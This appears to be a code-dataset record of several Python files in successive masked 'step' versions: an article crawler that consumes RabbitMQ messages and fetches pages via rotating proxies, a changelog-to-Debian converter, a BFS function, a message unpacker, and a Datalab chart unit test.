"step-4": "import requests\nfrom lxml import etree\nfrom pymongo import MongoClient\nfrom lib.rabbitmq import Rabbit\nfrom lib.log import LogHandler\nfrom lib.proxy_iterator import Proxies\nimport yaml\nimport json\nimport datetime\nimport re\nimport time\nsetting = yaml.load(open('config_local.yaml'))\nlog = LogHandler('article_consumer')\nm = MongoClient(setting['mongo_config']['config_host'], setting[\n 'mongo_config']['port'])\nm.admin.authenticate(setting['mongo_config']['user_name'], setting[\n 'mongo_config']['password'])\ncollection = m[setting['mongo_config']['config_db']][setting['mongo_config'\n ]['coll_detail']]\nclean_coll = m[setting['mongo_config']['config_db']][setting['mongo_config'\n ]['clean']]\nrabbit = Rabbit(setting['rabbitmq_host'], setting['rabbitmq_port'])\nconnection = rabbit.connection\n\n\nclass CrawlerDetail:\n\n def __init__(self):\n self.proxy = Proxies()\n\n def start_consume(self):\n channel = connection.channel()\n channel.queue_declare(queue='usual_article')\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.consume_article_detail_url, queue=\n 'usual_article', no_ack=False)\n channel.start_consuming()\n\n def clean(self, message):\n \"\"\"\n 作者,发布时间,详细来源字段清洗\n :param message:\n :return:\n \"\"\"\n clean = clean_coll.find_one({'source': message['source']})\n if clean['post_time'] is not None:\n try:\n post_time = re.search(clean['post_time'], message[\n 'post_time'], re.S | re.M).group(1)\n message['post_time'] = post_time\n except:\n log.info('post_time清洗失败{}'.format(message['post_time']))\n message['post_time'] = None\n if clean['author'] is not None:\n try:\n author = re.search(clean['author'], message['author']).group(1)\n message['author'] = author\n except:\n log.info('author清洗失败{}'.format(message['author']))\n message['author'] = None\n if clean['source_detail'] is not None:\n try:\n source_detail = re.search(clean['source_detail'], message[\n 'source_detail'], re.S | re.M).group(1)\n message['source_detail'] = source_detail\n except:\n log.info('source_detail清洗失败{}'.format(message['source_detail'])\n )\n message['source_detail'] = None\n return message\n\n def consume_article_detail_url(self, ch, method, properties, body):\n \"\"\"\n 文章详情页解析\n :param ch:\n :param method:\n :param properties:\n :param body: json格式字符串\n :return:\n \"\"\"\n message = json.loads(body.decode())\n for i in range(10):\n try:\n html = requests.get(message['detail_url'], timeout=10,\n proxies=next(self.proxy))\n connection.process_data_events()\n if html.status_code == 200:\n break\n except Exception as e:\n connection.process_data_events()\n if i == 10:\n log.error('请求文章详情页{}失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n try:\n con = html.content.decode()\n except:\n try:\n con = html.content.decode('gbk')\n except:\n log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n page = etree.HTML(con)\n detail_config_dict = collection.find_one({'source': message['source']})\n if detail_config_dict['body'] is not None:\n try:\n for pattern in detail_config_dict['body']:\n if page.xpath(pattern):\n article_body = page.xpath(pattern)[0]\n message['body'] = etree.tounicode(article_body)\n break\n except:\n log.error('xpath语句未能解析body')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n if detail_config_dict['comment_count'] is not None:\n message['comment_count'] = page.xpath(detail_config_dict[\n 'comment_count'])[0]\n if detail_config_dict['like_count'] is not None:\n message['like_count'] = page.xpath(detail_config_dict['like_count']\n )[0]\n if detail_config_dict['read_num'] is not None:\n message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]\n if detail_config_dict['author'] is not None:\n try:\n message['author'] = page.xpath(detail_config_dict['author'])[0]\n except:\n log.info('没有提取到{}作者字段'.format(message['detail_url']))\n if detail_config_dict['post_time'] is not None:\n try:\n message['post_time'] = page.xpath(detail_config_dict[\n 'post_time'])[0]\n except:\n log.info('没有提取到{}文章发表时间'.format(message['detail_url']))\n if detail_config_dict['tag'] is not None:\n message['tag'] = page.xpath(detail_config_dict['tag'])[0]\n if detail_config_dict['source_detail'] is not None:\n try:\n message['source_detail'] = page.xpath(detail_config_dict[\n 'source_detail'])[0]\n except:\n log.info('没有提取到{}文章详细来源'.format(message['detail_url']))\n self.clean(message)\n produce_channel = connection.channel()\n produce_channel.queue_declare('article_body')\n article_text = json.dumps(message)\n produce_channel.basic_publish(exchange='', routing_key=\n 'article_body', body=article_text)\n log.info('{}已经放入清洗队列'.format(message['title']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n produce_channel.close()\n",
"step-5": "import requests\nfrom lxml import etree\nfrom pymongo import MongoClient\nfrom lib.rabbitmq import Rabbit\nfrom lib.log import LogHandler\nfrom lib.proxy_iterator import Proxies\nimport yaml\nimport json\nimport datetime\nimport re\nimport time\n\n\nsetting = yaml.load(open('config_local.yaml'))\nlog = LogHandler('article_consumer')\nm = MongoClient(setting['mongo_config']['config_host'], setting['mongo_config']['port'])\nm.admin.authenticate(setting['mongo_config']['user_name'],setting['mongo_config']['password'] )\ncollection = m[setting['mongo_config']['config_db']][setting['mongo_config']['coll_detail']]\nclean_coll = m[setting['mongo_config']['config_db']][setting['mongo_config']['clean']]\nrabbit = Rabbit(setting['rabbitmq_host'],setting['rabbitmq_port'])\nconnection = rabbit.connection\n\n\nclass CrawlerDetail:\n\n def __init__(self):\n self.proxy = Proxies()\n\n def start_consume(self):\n channel = connection.channel()\n channel.queue_declare(queue='usual_article')\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.consume_article_detail_url,\n queue='usual_article',\n no_ack=False)\n channel.start_consuming()\n\n def clean(self,message):\n \"\"\"\n 作者,发布时间,详细来源字段清洗\n :param message:\n :return:\n \"\"\"\n clean = clean_coll.find_one({'source': message['source']})\n if clean['post_time'] is not None:\n try:\n post_time = re.search(clean['post_time'],message['post_time'],re.S|re.M).group(1)\n message['post_time'] = post_time\n except:\n log.info(\"post_time清洗失败{}\".format(message['post_time']))\n message['post_time'] = None\n if clean['author'] is not None:\n try:\n author = re.search(clean['author'],message['author']).group(1)\n message['author'] = author\n except:\n log.info(\"author清洗失败{}\".format(message['author']))\n message['author'] = None\n\n if clean['source_detail'] is not None:\n try:\n source_detail = re.search(clean['source_detail'],message['source_detail'],re.S|re.M).group(1)\n message['source_detail'] = source_detail\n except:\n log.info(\"source_detail清洗失败{}\".format(message['source_detail']))\n message['source_detail'] = None\n\n return message\n\n\n def consume_article_detail_url(self,ch, method, properties, body):\n \"\"\"\n 文章详情页解析\n :param ch:\n :param method:\n :param properties:\n :param body: json格式字符串\n :return:\n \"\"\"\n message = json.loads(body.decode())\n for i in range(10):\n try:\n html = requests.get(message['detail_url'],timeout=10,proxies=next(self.proxy))\n connection.process_data_events()\n if html.status_code == 200:\n break\n except Exception as e:\n connection.process_data_events()\n if i == 10:\n log.error(\"请求文章详情页{}失败\".format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n try:\n con = html.content.decode()\n except:\n try:\n con = html.content.decode('gbk')\n except:\n log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n page = etree.HTML(con)\n\n # 获取详情页的解析方式\n detail_config_dict = collection.find_one({'source': message['source']})\n\n if detail_config_dict['body'] is not None:\n try:\n for pattern in detail_config_dict['body']:\n if page.xpath(pattern):\n article_body = page.xpath(pattern)[0]\n message['body'] = etree.tounicode(article_body)\n break\n except:\n log.error('xpath语句未能解析body')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n if detail_config_dict['comment_count'] is not None:\n message['comment_count'] = page.xpath(detail_config_dict['comment_count'])[0]\n if detail_config_dict['like_count'] is not None:\n message['like_count'] = page.xpath(detail_config_dict['like_count'])[0]\n if detail_config_dict['read_num'] is not None:\n message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]\n if detail_config_dict['author'] is not None:\n try:\n message['author'] = page.xpath(detail_config_dict['author'])[0]\n except:\n log.info(\"没有提取到{}作者字段\".format(message['detail_url']))\n if detail_config_dict['post_time'] is not None:\n try:\n message['post_time'] = page.xpath(detail_config_dict['post_time'])[0]\n except:\n log.info(\"没有提取到{}文章发表时间\".format(message['detail_url']))\n if detail_config_dict['tag'] is not None:\n message['tag'] = page.xpath(detail_config_dict['tag'])[0]\n if detail_config_dict['source_detail'] is not None:\n try:\n message['source_detail'] = page.xpath(detail_config_dict['source_detail'])[0]\n except:\n log.info(\"没有提取到{}文章详细来源\".format(message['detail_url']))\n\n self.clean(message)\n\n # 放入消息队列做正文替换清洗\n produce_channel = connection.channel()\n produce_channel.queue_declare('article_body')\n article_text = json.dumps(message)\n produce_channel.basic_publish(exchange='',\n routing_key='article_body',\n body=article_text)\n log.info('{}已经放入清洗队列'.format(message['title']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n produce_channel.close()",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for line in sys.stdin:
m = re_entry_begin.match(line)
if m:
if first_line_met:
sys.stdout.write(signature_format.format(date=current_date))
version = m.group('version')
sys.stdout.write(header_format.format(version=version))
date = m.group('date')
if date is None:
date = VERSION_DATES[version]
current_date = None
for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):
try:
current_date = datetime.strptime(date, date_format)
break
except ValueError:
continue
if current_date is None:
raise ValueError('Date {} does not match any date format in {!r}'
.format(date, date_formats))
first_line_met = True
line_blank = not line.strip() or line.startswith('\\* *This Change Log was'
)
if first_line_met and not (line_blank and last_line_blank):
sys.stdout.write(' ' + line)
last_line_blank = line_blank
if first_line_met:
if not line_blank:
sys.stdout.write('\n')
sys.stdout.write(signature_format.format(date=current_date))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
MONTHS_REGEXP = (
'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'
)
re_entry_begin = re.compile(
'(?P<version>[\\d.]+)[ :]*\\(?(?P<date>\\d\\d\\d\\d-\\d\\d-\\d\\d|(?:' +
MONTHS_REGEXP + ') \\d\\d, \\d\\d\\d\\d)?\\)?.*$')
header_format = 'libkissfft ({version}) stable; urgency=medium\n\n'
signature_format = """ -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}
"""
VERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':
'2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':
'2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}
first_line_met = False
current_date = None
last_line_blank = False
for line in sys.stdin:
m = re_entry_begin.match(line)
if m:
if first_line_met:
sys.stdout.write(signature_format.format(date=current_date))
version = m.group('version')
sys.stdout.write(header_format.format(version=version))
date = m.group('date')
if date is None:
date = VERSION_DATES[version]
current_date = None
for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):
try:
current_date = datetime.strptime(date, date_format)
break
except ValueError:
continue
if current_date is None:
raise ValueError('Date {} does not match any date format in {!r}'
.format(date, date_formats))
first_line_met = True
line_blank = not line.strip() or line.startswith('\\* *This Change Log was'
)
if first_line_met and not (line_blank and last_line_blank):
sys.stdout.write(' ' + line)
last_line_blank = line_blank
if first_line_met:
if not line_blank:
sys.stdout.write('\n')
sys.stdout.write(signature_format.format(date=current_date))
<|reserved_special_token_1|>
from datetime import datetime
import re
import sys
MONTHS_REGEXP = (
'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'
)
re_entry_begin = re.compile(
'(?P<version>[\\d.]+)[ :]*\\(?(?P<date>\\d\\d\\d\\d-\\d\\d-\\d\\d|(?:' +
MONTHS_REGEXP + ') \\d\\d, \\d\\d\\d\\d)?\\)?.*$')
header_format = 'libkissfft ({version}) stable; urgency=medium\n\n'
signature_format = """ -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}
"""
VERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':
'2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':
'2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}
first_line_met = False
current_date = None
last_line_blank = False
for line in sys.stdin:
m = re_entry_begin.match(line)
if m:
if first_line_met:
sys.stdout.write(signature_format.format(date=current_date))
version = m.group('version')
sys.stdout.write(header_format.format(version=version))
date = m.group('date')
if date is None:
date = VERSION_DATES[version]
current_date = None
for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):
try:
current_date = datetime.strptime(date, date_format)
break
except ValueError:
continue
if current_date is None:
raise ValueError('Date {} does not match any date format in {!r}'
.format(date, date_formats))
first_line_met = True
line_blank = not line.strip() or line.startswith('\\* *This Change Log was'
)
if first_line_met and not (line_blank and last_line_blank):
sys.stdout.write(' ' + line)
last_line_blank = line_blank
if first_line_met:
if not line_blank:
sys.stdout.write('\n')
sys.stdout.write(signature_format.format(date=current_date))
<|reserved_special_token_1|>
#!/usr/bin/env python3
from datetime import datetime
import re
import sys
MONTHS_REGEXP = ('Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|'
'January|February|March|April|June|July|August|September|October|November|December')
re_entry_begin = re.compile(r'(?P<version>[\d.]+)[ :]*\(?(?P<date>\d\d\d\d-\d\d-\d\d|(?:'
+ MONTHS_REGEXP + r') \d\d, \d\d\d\d)?\)?.*$')
header_format = 'libkissfft ({version}) stable; urgency=medium\n\n'
signature_format = ' -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n'
# Missing from CHANGELOG (found in hg log), or not parseable easily
VERSION_DATES = {
'1.2.8': '2008-08-22',
'1.2.7': '2007-01-07',
'1.2.2': '2005-05-06',
'1.2.1': '2004-04-04',
'1.1.1': '2004-02-01',
'1.1': '2004-01-30',
'0.4': '2003-11-04',
'0.1': '2003-05-19',
}
first_line_met = False
current_date = None
last_line_blank = False
for line in sys.stdin:
m = re_entry_begin.match(line)
if m:
if first_line_met:
sys.stdout.write(signature_format.format(date=current_date))
version = m.group('version')
sys.stdout.write(header_format.format(version=version))
date = m.group('date')
if date is None:
date = VERSION_DATES[version]
current_date = None
for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):
try:
current_date = datetime.strptime(date, date_format)
break
except ValueError:
continue
if current_date is None:
raise ValueError('Date {} does not match any date format in {!r}'
.format(date, date_formats))
first_line_met = True
line_blank = not line.strip() or line.startswith(r'\* *This Change Log was')
if first_line_met and not (line_blank and last_line_blank):
sys.stdout.write(' ' + line)
last_line_blank = line_blank
if first_line_met:
if not line_blank:
sys.stdout.write('\n')
sys.stdout.write(signature_format.format(date=current_date))
|
flexible
|
{
"blob_id": "03677f02473019fcc6a40d91569a85be78ca0a87",
"index": 7179,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-3": "<mask token>\nMONTHS_REGEXP = (\n 'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'\n )\nre_entry_begin = re.compile(\n '(?P<version>[\\\\d.]+)[ :]*\\\\(?(?P<date>\\\\d\\\\d\\\\d\\\\d-\\\\d\\\\d-\\\\d\\\\d|(?:' +\n MONTHS_REGEXP + ') \\\\d\\\\d, \\\\d\\\\d\\\\d\\\\d)?\\\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = \"\"\" -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n\"\"\"\nVERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':\n '2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':\n '2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-4": "from datetime import datetime\nimport re\nimport sys\nMONTHS_REGEXP = (\n 'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'\n )\nre_entry_begin = re.compile(\n '(?P<version>[\\\\d.]+)[ :]*\\\\(?(?P<date>\\\\d\\\\d\\\\d\\\\d-\\\\d\\\\d-\\\\d\\\\d|(?:' +\n MONTHS_REGEXP + ') \\\\d\\\\d, \\\\d\\\\d\\\\d\\\\d)?\\\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = \"\"\" -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n\"\"\"\nVERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':\n '2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':\n '2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-5": "#!/usr/bin/env python3\nfrom datetime import datetime\nimport re\nimport sys\n\nMONTHS_REGEXP = ('Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|'\n 'January|February|March|April|June|July|August|September|October|November|December')\n\nre_entry_begin = re.compile(r'(?P<version>[\\d.]+)[ :]*\\(?(?P<date>\\d\\d\\d\\d-\\d\\d-\\d\\d|(?:'\n + MONTHS_REGEXP + r') \\d\\d, \\d\\d\\d\\d)?\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = ' -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\\n\\n'\n\n# Missing from CHANGELOG (found in hg log), or not parseable easily\nVERSION_DATES = {\n '1.2.8': '2008-08-22',\n '1.2.7': '2007-01-07',\n '1.2.2': '2005-05-06',\n '1.2.1': '2004-04-04',\n '1.1.1': '2004-02-01',\n '1.1': '2004-01-30',\n '0.4': '2003-11-04',\n '0.1': '2003-05-19',\n}\n\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\n\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n\n version = m.group('version')\n\n sys.stdout.write(header_format.format(version=version))\n\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n\n line_blank = not line.strip() or line.startswith(r'\\* *This Change Log was')\n\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n\n last_line_blank = line_blank\n\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def bfs(graph, start):
queue = [start]
queued = list()
path = list()
while queue:
print('Queue is: %s' % queue)
vertex = queue.pop(0)
print('Processing %s' % vertex)
for candidate in graph[vertex]:
if candidate not in queued:
queued.append(candidate)
queue.append(candidate)
path.append(vertex + '>' + candidate)
print('Adding %s to the queue' % candidate)
return path
|
normal
|
{
"blob_id": "7bb49712c4ef482c64f3c2a457a766de691ba7c3",
"index": 9427,
"step-1": "<mask token>\n",
"step-2": "def bfs(graph, start):\n queue = [start]\n queued = list()\n path = list()\n while queue:\n print('Queue is: %s' % queue)\n vertex = queue.pop(0)\n print('Processing %s' % vertex)\n for candidate in graph[vertex]:\n if candidate not in queued:\n queued.append(candidate)\n queue.append(candidate)\n path.append(vertex + '>' + candidate)\n print('Adding %s to the queue' % candidate)\n return path\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
'''CLASS message_unpacker
Message bodies sent through RabbitMQ may take various forms. They were packed
accordingly by the message_packager.
This class reverses the process. Currently, only implemented for message bodies
represented as strings, but could also handle various image formats in a real use
situation
Encapsulating the "unpacking" aspect into this class makes it easier to extend the
functionality of methods needed for unpacking data as a function of the data types
(e.g. lidar, radar, numeric, GPS) that are packaged by message_packager.
'''
import pickle
import json
class MessageUnpacker():
def __init__(self):
print('Generating message unpacker...')
# Unpacks messages that were packaged as a field-delimited (';') string representation
def unpack_string_to_dict(self, incoming_values):
FIELD_DELIMITER = ';'
fields = ['message_num', 'time_stamp', 'car_id', 'device_id', 'data_type', 'error_flag', 'data']
values = incoming_values.split(FIELD_DELIMITER)
record_as_dict = {}
for f, v in zip(fields, values):
record_as_dict[f] = v
record_as_dict['data'] = record_as_dict['data'].strip('\n') # artifact of message body
return record_as_dict
# Unpacks messages that were packaged as JSON
def unpack_json_to_dict(self, incoming_json):
record_as_dict = json.loads(incoming_json)
return record_as_dict
# Unpacks messages that were pickled
def unpickle_to_dict(self, pickled_message):
record_as_dict = pickle.loads(pickled_message)
return record_as_dict
|
normal
|
{
"blob_id": "2afc1027c6866e8ab9584a5f7feef4470661f763",
"index": 4246,
"step-1": "<mask token>\n\n\nclass MessageUnpacker:\n <mask token>\n <mask token>\n\n def unpack_json_to_dict(self, incoming_json):\n record_as_dict = json.loads(incoming_json)\n return record_as_dict\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MessageUnpacker:\n <mask token>\n\n def unpack_string_to_dict(self, incoming_values):\n FIELD_DELIMITER = ';'\n fields = ['message_num', 'time_stamp', 'car_id', 'device_id',\n 'data_type', 'error_flag', 'data']\n values = incoming_values.split(FIELD_DELIMITER)\n record_as_dict = {}\n for f, v in zip(fields, values):\n record_as_dict[f] = v\n record_as_dict['data'] = record_as_dict['data'].strip('\\n')\n return record_as_dict\n\n def unpack_json_to_dict(self, incoming_json):\n record_as_dict = json.loads(incoming_json)\n return record_as_dict\n\n def unpickle_to_dict(self, pickled_message):\n record_as_dict = pickle.loads(pickled_message)\n return record_as_dict\n",
"step-3": "<mask token>\n\n\nclass MessageUnpacker:\n\n def __init__(self):\n print('Generating message unpacker...')\n\n def unpack_string_to_dict(self, incoming_values):\n FIELD_DELIMITER = ';'\n fields = ['message_num', 'time_stamp', 'car_id', 'device_id',\n 'data_type', 'error_flag', 'data']\n values = incoming_values.split(FIELD_DELIMITER)\n record_as_dict = {}\n for f, v in zip(fields, values):\n record_as_dict[f] = v\n record_as_dict['data'] = record_as_dict['data'].strip('\\n')\n return record_as_dict\n\n def unpack_json_to_dict(self, incoming_json):\n record_as_dict = json.loads(incoming_json)\n return record_as_dict\n\n def unpickle_to_dict(self, pickled_message):\n record_as_dict = pickle.loads(pickled_message)\n return record_as_dict\n",
"step-4": "<mask token>\nimport pickle\nimport json\n\n\nclass MessageUnpacker:\n\n def __init__(self):\n print('Generating message unpacker...')\n\n def unpack_string_to_dict(self, incoming_values):\n FIELD_DELIMITER = ';'\n fields = ['message_num', 'time_stamp', 'car_id', 'device_id',\n 'data_type', 'error_flag', 'data']\n values = incoming_values.split(FIELD_DELIMITER)\n record_as_dict = {}\n for f, v in zip(fields, values):\n record_as_dict[f] = v\n record_as_dict['data'] = record_as_dict['data'].strip('\\n')\n return record_as_dict\n\n def unpack_json_to_dict(self, incoming_json):\n record_as_dict = json.loads(incoming_json)\n return record_as_dict\n\n def unpickle_to_dict(self, pickled_message):\n record_as_dict = pickle.loads(pickled_message)\n return record_as_dict\n",
"step-5": "'''CLASS message_unpacker\n\n Message bodies sent through RabbitMQ may take various forms. They were packed\n accordingly by the message_packager.\n\n This class reverses the process. Currently, only implemented for message bodies\n represented as strings, but could also handle various image formats in a real use\n situation\n\n Encapsulating the \"unpacking\" aspect into this class makes it easier to extend the\n functionality of methods needed for unpacking data as a function of the data types \n (e.g. lidar, radar, numeric, GPS) that are packaged by message_packager.\n'''\nimport pickle\nimport json\n\nclass MessageUnpacker():\n\n def __init__(self):\n print('Generating message unpacker...')\n\n # Unpacks messages that were packaged as a field-delimited (';') string representation\n def unpack_string_to_dict(self, incoming_values):\n FIELD_DELIMITER = ';'\n fields = ['message_num', 'time_stamp', 'car_id', 'device_id', 'data_type', 'error_flag', 'data']\n values = incoming_values.split(FIELD_DELIMITER)\n record_as_dict = {}\n\n for f, v in zip(fields, values):\n record_as_dict[f] = v\n record_as_dict['data'] = record_as_dict['data'].strip('\\n') # artifact of message body\n\n return record_as_dict \n\n # Unpacks messages that were packaged as JSON\n def unpack_json_to_dict(self, incoming_json):\n record_as_dict = json.loads(incoming_json)\n return record_as_dict\n\n # Unpacks messages that were pickled\n def unpickle_to_dict(self, pickled_message):\n record_as_dict = pickle.loads(pickled_message)\n return record_as_dict\n\n\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations under
# the License.
from __future__ import absolute_import
from __future__ import unicode_literals
import unittest
# import Python so we can mock the parts we need to here.
import IPython.core.display
import IPython.core.magic
import datalab.utils.commands
def noop_decorator(func):
return func
IPython.core.magic.register_line_cell_magic = noop_decorator
IPython.core.magic.register_line_magic = noop_decorator
IPython.core.magic.register_cell_magic = noop_decorator
IPython.core.display.HTML = lambda x: x
IPython.core.display.JSON = lambda x: x
class TestCases(unittest.TestCase):
def test_chart_cell(self):
t = [{'country': 'US', 'quantity': 100}, {'country': 'ZA', 'quantity': 50}]
IPython.get_ipython().user_ns = {}
chart = datalab.utils.commands._chart._chart_cell({'chart': 'geo', 'data': t, 'fields': None},
'')
self.assertTrue(chart.find('charts.render(') > 0)
self.assertTrue(chart.find('\'geo\'') > 0)
self.assertTrue(chart.find('"fields": "*"') > 0)
self.assertTrue(chart.find('{"c": [{"v": "US"}, {"v": 100}]}') > 0 or
chart.find('{"c": [{"v": 100}, {"v": "US"}]}') > 0)
self.assertTrue(chart.find('{"c": [{"v": "ZA"}, {"v": 50}]}') > 0 or
chart.find('{"c": [{"v": 50}, {"v": "ZA"}]}') > 0)
def test_chart_magic(self):
# TODO(gram): complete this test
pass
|
normal
|
{
"blob_id": "445e91edbeb88a3e300761342b28369fd9833fbb",
"index": 5727,
